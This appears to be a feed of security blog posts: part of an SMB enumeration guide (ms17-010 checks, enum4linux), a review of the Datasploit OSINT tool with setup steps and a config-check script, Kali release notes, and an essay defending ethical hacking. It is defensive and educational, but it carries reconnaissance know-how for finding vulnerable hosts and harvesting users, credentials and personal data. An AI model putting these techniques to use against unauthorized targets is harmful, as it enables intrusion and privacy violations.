The script connects to the IPC$ tree, executes a transaction on FID 0 and checks if the error “STATUS_INSUFF_SERVER_RESOURCES” is returned to determine if the target is not patched against ms17-010. Additionally it checks for known error codes returned by patched systems.

From the image given below you can observe that it found the target machine vulnerable to ms17-010 due to SMBv1.

Enum4linux

Enum4linux is a tool for enumerating information from Windows and Samba systems. It attempts to offer similar functionality to enum.exe formerly available from www.bindview.com.

It is written in Perl and is basically a wrapper around the Samba tools smbclient, rpcclient, net and nmblookup.

The tool usage can be found below followed by examples, previous versions of the tool can be found at the bottom of the page.

Key features:

  • RID cycling (When RestrictAnonymous is set to 1 on Windows 2000)
  • User listing (When RestrictAnonymous is set to 0 on Windows 2000)
  • Listing of group membership information
  • Share enumeration
  • Detecting if host is in a workgroup or a domain
  • Identifying the remote operating system
  • Password policy retrieval (using polenum)

enum4linux -a 192.168.1.102

As you can observe, it has shown that the target belongs to a workgroup and has dumped the NetBIOS names along with their suffixes, and much more information.

It also enumerates users along with their RIDs in hexadecimal form with the help of rpcclient. Hence enum4linux is a Swiss-army knife when we perform enumeration, but it cannot identify SMB vulnerabilities like Nmap can.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets.

The post A Little Guide to SMB Enumeration appeared first on Hacking Articles.

Top 10 Skills Every Purple Teamer Must Have

Today, cyber threats are created faster and are in a more sophisticated manner than ever before. Bad actors are ready to go the extra mile to get their hands on all types of organizations, industries, and information. So, in a hyper-connected world where everyone is a target, what are the top skills purple teamers need to have? Find out.
  1. Web Application Penetration Testing — It is the process of using penetration testing techniques on a web application to detect its vulnerabilities before cybercriminals do.
  2. Mobile Penetration Testing — Mobile apps are becoming an increasing asset for businesses, but a threat at the same time. To make sure customers’ data is secure, mobile apps need to be tested for vulnerabilities as well.
  3. WiFi Penetration Testing — A compromised WiFi puts an entire organization’s network at risk. WiFi penetration testing is a crucial skill for IT Security professionals in 2018, and hiring managers know it.
  4. Advanced Social Engineering — Knowing the various means by which attackers can use social engineering techniques to gain access to an organization’s data is a great skill for all security professionals. You’ll need to be aware of the psychology and technical elements involved in phishing, vishing, baiting, etc.
  5. Advanced Adversary Simulation — By performing security assessments that simulate adversary attacks, an organization’s security is put to the test — from inside out, and focused on what attackers can get access to when successfully penetrating an organization’s environment.
  6. Defense Evasion — Defense Evasion is a tactic an adversary may use to bypass an information security device in order to ‘evade’ detection, or other defenses. Needless to say, it’s a red-teamer’s essential skill too.
  7. Threat Hunting — Threat Hunting skills come with knowing how to proactively search through networks to detect and isolate advanced threats that may have evaded existing security solutions.
  8. Threat Intelligence — By knowing how to analyze internal and external threats an organization may face, you are gathering threat intelligence. This knowledge will then help you make more informed decisions on potential remediation solutions, plans, etc.
  9. Incident Response — Incident response skills come with being able to address and manage the aftermath of a security breach or cyber attack. This comes in handy in a world where an attack happens every 39 seconds on average.
  10. Endpoint Monitoring — Endpoints are typically the initial target because they provide an entry point to the network, and therefore, access to the data attackers want. Knowing how to thoroughly monitor those endpoints and detect unknown threats is a valuable skill for any IT security professional to have.
How Can You Get There?

The purple teamer training path was designed as a guide for you to become equally skilled in both advanced offensive and defensive security techniques. This training path includes the latest versions of our Penetration Testing Professional (PTP), Penetration Testing Extreme (PTX), and Threat Hunting Professional (THP) training courses. Dive into the Purple Teamer path with a free demo of each course and see for yourself!


Special Offer — Until November 30, 2018

If you are just beginning in this field, or if you feel that you need to review the penetration testing basics, we’re offering a free Penetration Testing Student (PTS) training course in Elite Edition with every enrollment in the PTP training course in Elite Edition until November 30, 2018.


Toolsmith #127: OSINT with Datasploit

I was reading an interesting Motherboard article, Legal Hacking Tools Can Be Useful for Journalists, Too, that includes reference to one of my all time OSINT favorites, Maltego. Joseph Cox's article also mentions Datasploit, a 2016 favorite for fellow tools aficionado, Toolswatch.org, see 2016 Top Security Tools as Voted by ToolsWatch.org Readers. Having not yet explored Datasploit myself, this proved to be a grand case of "no time like the present."
Datasploit is "an #OSINT Framework to perform various recon techniques, aggregate all the raw data, and give data in multiple formats." More specifically, as stated on Datasploit documentation page under Why Datasploit, it utilizes various Open Source Intelligence (OSINT) tools and techniques found to be effective, and brings them together to correlate the raw data captured, providing the user relevant information about domains, email address, phone numbers, person data, etc. Datasploit is useful to collect relevant information about target in order to expand your attack and defense surface very quickly.
The feature list includes:
  • Automated OSINT on domain / email / username / phone for relevant information from different sources
  • Useful for penetration testers, cyber investigators, defensive security professionals, etc.
  • Correlates and collates results, and shows them in a consolidated manner
  • Tries to find out credentials, API keys, tokens, sub-domains, domain history, legacy portals, and more as related to the target
  • Available as single consolidating tool as well as standalone scripts
  • Performs Active Scans on collected data
  • Generates HTML, JSON reports along with text files
Resources
Github: https://github.com/datasploit/datasploit
Documentation: http://datasploit.readthedocs.io/en/latest/
YouTube: Quick guide to installation and use

Pointers
Second, a few pointers to keep you from losing your mind. This project is very much a work in progress, with lots of very frustrated users filing bugs and wondering where the support is. The team is doing their best, so be patient with them, but read through the Github issues to be sure any bugs you run into haven't already been addressed.
1) Datasploit does not error gracefully, it just crashes. This can be the result of unmet dependencies or even a missing API key. Do not despair, take note, I'll talk you through it.
2) For ease, and the best match to the documentation, I suggest running Datasploit from an Ubuntu variant. Your best bet is to grab Kali, as a VM or on dedicated hardware, and load it up there, as I did.
3) My installation guidance and recommendations should get you running trouble-free; follow it explicitly.
4) Acquire as many API keys as possible, see further detail below.

Installation and preparation
From Kali bash prompt, in this order:

  1. git clone https://github.com/datasploit/datasploit /etc/datasploit
  2. apt-get install libxml2-dev libxslt-dev python-dev lib32z1-dev zlib1g-dev
  3. cd /etc/datasploit
  4. pip install -r requirements.txt
  5. mv config_sample.py config.py
  6. With your preferred editor, open config.py and add API keys for the following at a minimum; they are, for all intents and purposes, required, and detailed instructions to acquire each are here:
    1. Shodan API
    2. Censysio ID and Secret
    3. Clearbit API
    4. Emailhunter API
    5. Fullcontact API
    6. Google Custom Search Engine API key and CX ID
    7. Zoomeye Username and Password
If, and only if, you've done all of this correctly, you might end up with a running instance of Datasploit. :-) Seriously, this is some of the glitchiest software I've tussled with in quite a while, but the results paid handsomely. Run python datasploit.py domain.com, where domain.com is your target. Obviously, I ran python datasploit.py holisticinfosec.org to acquire results pertinent to your author. 
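Because a missing key shows up as a crash rather than an error message (pointer 1 above), a preflight check of config.py saves time. This is an added example, not Datasploit's own code: the variable names in REQUIRED_SETTINGS and the placeholder strings are assumptions for illustration, so substitute the names from your config_sample.py; the config fragment is constructed. The check reads the file with `ast` so the config is never executed.

```python
import ast
from typing import Dict, List

# Assumed variable names (hypothetical; check config_sample.py for the real
# ones), mapped to the seven services the installation steps list as required.
REQUIRED_SETTINGS: Dict[str, str] = {
    "shodan_api": "Shodan API",
    "censysio_id": "Censys.io ID",
    "censysio_secret": "Censys.io secret",
    "clearbit_apikey": "Clearbit API",
    "emailhunter": "Emailhunter API",
    "fullcontact_api": "Fullcontact API",
    "google_cse_key": "Google CSE API key",
    "google_cse_cx": "Google CSE CX ID",
    "zoomeye_user": "Zoomeye username",
    "zoomeye_pass": "Zoomeye password",
}

# Placeholder values a freshly copied sample config might still carry
# (constructed list for this example).
PLACEHOLDERS = {"", "XXXX", "your_api_key", "<insert key here>"}


def _string_assignments(source: str) -> Dict[str, str]:
    """Return {name: value} for every top-level `name = "literal"` in source."""
    found: Dict[str, str] = {}
    for node in ast.parse(source).body:
        if not isinstance(node, ast.Assign):
            continue
        if isinstance(node.value, ast.Constant) and isinstance(node.value.value, str):
            for target in node.targets:
                if isinstance(target, ast.Name):
                    found[target.id] = node.value.value
    return found


def missing_settings(config_source: str,
                     required: Dict[str, str] = REQUIRED_SETTINGS) -> List[str]:
    """Labels of required settings that are absent, not string literals,
    or still set to a placeholder value."""
    values = _string_assignments(config_source)
    return [label for var, label in required.items()
            if values.get(var) is None or values[var].strip() in PLACEHOLDERS]


# Constructed config.py fragment: two placeholders and one missing variable.
SAMPLE_CONFIG = '''\
shodan_api = "0123456789abcdef"
censysio_id = ""
censysio_secret = "XXXX"
clearbit_apikey = "constructed-clearbit-key"
emailhunter = "constructed-hunter-key"
fullcontact_api = "constructed-fc-key"
google_cse_key = "constructed-google-key"
google_cse_cx = "constructed-cx"
zoomeye_user = "analyst@example.com"
# zoomeye_pass is missing entirely
'''

if __name__ == "__main__":
    problems = missing_settings(SAMPLE_CONFIG)
    if problems:
        print("Refusing to run datasploit; fix these settings first:")
        for p in problems:
            print(" -", p)
    else:
        print("config.py looks complete")
```

For a real run, pass `open("/etc/datasploit/config.py").read()` to `missing_settings` and only start datasploit.py when the list is empty.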
Datasploit rapidly pulled results as follows:
211 domain references from Github:
Github results
Luckily, no results from Shodan. :-)
Four results from Paste(s): 
Pastebin and Pastie results
Datasploit pulled russ at holisticinfosec dot org as expected, per email harvesting.
Accurate HolisticInfoSec host location data from Zoomeye:

Details regarding HolisticInfoSec sub-domains and page links:
Sub-domains and page links
Finally, a good return on DNS records for holisticinfosec.org and, thankfully, no vulns found via PunkSpider.

DataSploit can also be integrated into other code and called as individual scripts for unique functions. I did a quick run with python emailOsint.py russ@holisticinfosec.org and the results were impressive:
Email OSINT
I love that the first query is of Troy Hunt's Have I Been Pwned. Not sure if you have been? Better check it out. Reminder here, you'll really want to be sure to have as many API keys as possible or you may find these buggy scripts crashing. You'll definitely find yourself compromising between frustration and the rapid, detailed results. I put this offering squarely in the "shows much promise category" if the devs keep focus on it, assess for quality, and handle errors better.
Give Datasploit a try for sure.
Cheers, until next time...

Hacking WPA Enterprise with Kali Linux

Admittedly, somewhat of a click-bait blog post title - but bear with us, it's for a good reason. Lots of work goes on behind the scenes of Kali Linux, tools get updated every day and interesting new features are added constantly. Most of these tool updates and feature additions go unannounced, and are then discovered by inquisitive users - however this time, we had to make an exception.

Toolsmith Release Advisory: Kali Linux 2016.2 Release

On the heels of Black Hat and DEF CON, 31 AUG 2016 brought us the second Kali Rolling ISO release aka Kali 2016.2. This release provides a number of updates for Kali, including:
  • New KDE, MATE, LXDE, e17, and Xfce builds for folks who want a desktop environment other than Gnome.
  • Kali Linux Weekly ISOs, updated weekly builds of Kali that will be available to download via their mirrors.
  • Bug Fixes and OS Improvements such as HTTPS support in busybox now allowing the preseed of Kali installations securely over SSL. 
All details available here: https://www.kali.org/news/kali-linux-20162-release/
Thanks to Rob Vandenbrink for calling out this release. 

Kali Rolling ISO of DOOM, Too.

A while back we introduced the idea of Kali Linux Customization by demonstrating the Kali Linux ISO of Doom. Our scenario covered the installation of a custom Kali configuration which contained select tools required for a remote vulnerability assessment. The customised Kali ISO would undergo an unattended autoinstall in a remote client site, and automatically connect back to our OpenVPN server over TCP port 443. The OpenVPN connection would then bridge the remote and local networks, allowing us full "layer 3" access to the internal network from our remote location. The resulting custom ISO could then be sent to the client who would just pop it into a virtual machine template, and the whole setup would happen automagically with no intervention - as depicted in the image below.

In Defense of Ethical Hacking

Pete Herzog wrote an interesting piece on Dark Matters (Norse’s blog platform) a while back, and I’ve given it a few days to sink in because I didn’t want my response to be emotional. After a few days I’ve re-read the post a few more times and still have no idea where Pete, someone I otherwise consider fairly sane and smart (see his bio: http://blog.norsecorp.com/author/pherzog/), gets this premise he’s writing about. In fact, it annoyed me enough that I wrote up a response to his post… and Pete, I’m confused where this point of view comes from! I’d genuinely like to know… I’ll reach out and see if we can figure it out.

— For the sake of this blog post, I consider ethical hacking and penetration testing to effectively be the same thing. I know not everyone agrees, and that’s unfortunate, but I guess you can’t please everyone.

So here are my comments on Pete’s blog post titled “The Myth of Ethical Hacking” (http://blog.norsecorp.com/2015/01/27/the-myth-of-ethical-hacking/).

I thought reacting is what you did when you weren’t secure. And I thought ethical hacking was proactive, showing you could take advantage of opportunities left by the stupid people who did the security.
— Boy am I glad he doesn’t think this way anymore. Reacting is part of life, but it’s not done because you’re insecure, it’s done because business and technology, along with your adversaries, are dynamic. It’s like standing outside without an umbrella. It’s not raining… but if you stand there long enough you’ll need an umbrella. It’s not that you are stupid, it’s that weather changes. If you’re in Chicago, like I am, this happens about every 2.7 seconds.
I also thought ethical hacking and security testing were the same thing, because while security testing focused on making sure all security controls were there and working right and ethical hacking focused on showing a criminal could penetrate existing security controls, both were about proactively learning what needed to be better secured.
— That’s an interesting distinction. I can’t say I believe this is any more than a simple difference in word choice. Isn’t this all about validation of the security an organization thinks they have, versus the reality of how attackers act and what they will target? I guess I could be wrong, but these terms: vulnerability testing, penetration testing, ethical hacking, security testing — they create confusion in the people trying to consume these services, understand security, and hire. Do they have any real value? I think this is one reason standards efforts by people in the security testing space were started, to demystify, de-obfuscate, and lessen confusion. Clearly it’s not working as intended?
Ethical hacking, penetration testing, and red-teaming are still considered valid ways to improve security posture despite that they test the tester as much, if not more, than the infrastructure.
— Now, here’s a statement that I largely agree with. It’s not controversial anymore to say this. This is why things like the PTES (Penetration Testing Execution Standard) were born. Taking a look at the people who are behind this standard, you can easily see that it’s not just another shot in the dark or empty effort - http://www.pentest-standard.org/index.php/FAQ. Standardizing how a penetration test (or ethical hack, these should be the same thing in my mind). Let me address red teaming for a minute too. Red Team exercises are not the same thing as penetration testing and ethical hacking — not really — it’s like the difference between asking someone if they can pick the lock on the front door, versus daring someone to break into your house and steal your passport without reservation. Red Teaming is a more aggressive approach. I’ve heard some call Red Team exercises “closer to what an actual attacker would behave like”; your mileage may vary on that one. Bottom line, though, you always get the quality you ask for (pay for). If you are willing to pay for high-grade talent, generally speaking you’ll get high-grade talent. If you’re looking for a cheap penetration test your results will likely be vastly different because the resources on the job may not be as senior or knowledgeable. The other thing here is this — not all penetration testers are experts in all technologies at your shop. Keep this in mind. Some folks are magicians with a Linux/Unix system, while others have grown their expertise in the Windows world. Some are web application experts, some are infrastructure experts, and some are generalists. The bottom line is that this is both true, something that should be accounted for, and largely not the fault of the tester.
Then again nearly everything has a positive side we can see if we squint. And as a practical, shake-the-CEO-into-awareness technique, criminal hacking simulations should be good for fostering change in a security posture.
— I read this and wonder to myself… if the CEO hasn’t already been “shaken into awareness” through headlines in the papers and nightly news, then there is something else going on here that a successful ethical hack ransack of the enterprise likely won’t solve.
So somehow, ethical hackers with their penetration testing and red-teaming, despite any flaws, have taken on this status of better security than, say, vulnerability scanning. Because there’s a human behind it? Is it artisan, and thus we pay more?
— Wait, what?! If you see these two as equal, then you’ve either done a horrible job at picking your ethical hacker/penetration testers, or you don’t understand what you’re saying. As someone who spent a few years demonstrating to companies that web application security tools were critical to their success, I’ve never, ever said they can replace a human tester. Ever. To answer the question directly — YES, because there’s a human behind it, this is an entirely different thing. See above about quality of penetration tester, but the point stands.
It also has a fatal flaw: It tests for known vulnerabilities. However, in great marketing moves of the world volume 1, that is exactly how they promote it. That’s why companies buy it. But if an ethical hacker markets that they test only for known vulnerabilities, we say they suck.
— Oh, I think I see what’s going on here. The author is confusing vulnerability assessment with penetration testing, maybe. That’s the only logical explanation I can think of. Penetration testers have a massive advantage over scanning tools because of this wonderful thing called the human intellect. They can see and interpret errors that systems kick back. Because tools look for patterns, and respond accordingly, there are times where a human can see an error message and understand what it’s implying, but the machine has no such ability. In spite of all of technology’s advancements, tools are still using regular expressions and some rudimentary if-then clauses for pattern recognition. Machines, and by extension software, do not think. This gives software a disadvantage over a human 100% of the time.
Now vulnerability scanning is indeed reactive. We wait for known flaws to be known, scan for them, and we then react to that finding by fixing it. Ethical hacking is indeed proactive. But not because it gives the defender omniscient threat awareness, but rather so we can know all the ways where someone can break in. Then we can watch for it or even fix it.
— I’m going to ignore the whole reactive vs proactive debate here. I don’t believe it’s productive to the post here, and I think many people don’t understand what these terms mean in security anyway. First, you’ll never, ever know “all the ways someone can break in”, ever. Never. That’s the beauty of the human mind. Human beings are a creative bunch, and when properly incentivized, we will find a way once we’ve exhausted all the known ways. However, there’s a little caveat here, which is not talked about enough I don’t believe. The reason we won’t ever know all the ways someone can break in, even if we give humans the ability to find all the ways — is this thing called scope, and time. Penetration testers, ethical hackers and whatever you want to call them are time-boxed. Rarely do you get an open-ended contract, or even in the case of an internal resource, the ability to dedicate all the time you have to the task of finding ways to break in. Furthermore, there are many, many, many ways to break in typically. Systems can be mis-configured, un-patched, and left exposed in a million different ways. And even if you did have all the time you needed, these systems are dynamic and are going to change on you at some point, unless you work in one of "those" organizations, and if so then you’ve got bigger problems.
But does it really work that way? Isn’t what passes for ethical hacking too often just running vulnerability scanners to find the low hanging fruit and exploit that to prove a criminal could get in? Isn’t that really just finding known vulnerabilities like a vulnerability scanner does, but with a little verification thrown in?
— And here it is. Let me answer this question from the many, many people I know who do actual ethical hacking/penetration testing: no. Also if you find this to be actually true in your experience, you’re getting the wrong penetration testers. Maybe fire your provider or staff.
There’s this myth that ethical hackers will make better security by breaking through existing security in complicated, sometimes clever ways that point out the glaring flaw(s) of the moment for remediation.
— Talk to someone who does serious penetration testing for a living, or manages one of these teams. Many of them have a store of clever, custom code up their sleeves but rarely have to use it because the systems they test have so much broken on them that dropping custom code isn’t even remotely necessary.
But we know that all too often it’s just vulnerability scanning with scare tactics.
— Again, you’re dealing with some seriously amateur, bad people or providers. Fire them.
And when there’s no way in, they play the social engineering card.
— a) I don’t see the issue with this approach, b) there’s a 99.9% chance there is a way in without “playing the social engineering card”.
One of the selling points of ethical hacking is the skilled use of social engineering. Let me save you some money: It works.
— Yes, 90%+ of the time, even when the social engineer isn’t particularly skilled, it works. Why? Human nature. Also, employees who don’t know better. So what if it works though, you still need to leverage that testing to show real-use-cases of how your defenses were easily penetrated for educational purposes. Record it. Highlight those employees who let that guy with the 4 coffee cups in his hands through the turnstile without asking for a badge… but do it constructively so that they and their peers will remember. Testing should drive awareness, and real-life use cases are priceless.
So if ethical hacking as it’s done is a myth…
— Let me stop you right there. It’s not, you’ve just had some terrible experiences I don’t believe are indicative of the wider industry. So since the rest of the article is based on this, I think we’re done here.